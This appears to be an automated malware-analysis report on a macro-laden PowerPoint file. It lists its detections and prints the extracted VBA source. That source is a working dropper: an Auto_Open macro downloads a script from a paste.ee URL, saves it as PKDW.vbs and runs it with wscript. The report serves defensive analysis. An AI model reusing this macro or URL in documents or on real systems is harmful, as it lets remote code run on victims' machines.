MALICIOUS
190
Risk Score
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell ("wscript PKDW.vbs") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.write JjBl.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set JjBl = CreateObject("Microsoft.XMLHTTP") -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Public Sub Auto_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://paste.ee/d/OxThF/0 Referenced by macro
- https://paste.ee/d/OxThF/0�Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1061 bytes |
SHA-256: 88974c3139f69c3dc1a4504e8b4b3d822b677b5f4888dbd6130c3ac16f3f2f98 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
Set JjBl = CreateObject("Microsoft.XMLHTTP")
Set YoLW = CreateObject("Adodb.Stream")
With JjBl
.Open "GET", "https://paste.ee/d/OxThF/0", False
.send
End With
With YoLW
.Type = 1
.Open
.write JjBl.responseBody
.savetofile "PKDW.vbs", 2
End With
Shell ("wscript PKDW.vbs")
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D0A1A585-CDA5-4A8A-B275-FCE26607F9CC}{B6D80F10-933B-4A57-8E4E-567EBDC053C2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{EF85728B-2834-4A6C-B0E9-D369092343D3}{045A2107-5B4D-4169-B9E2-F5B768339FFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 108032 bytes |
SHA-256: 54dfa6ebe141dc3c25230626165f804bc81aeff23ef51e1393acd1683c751aa5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.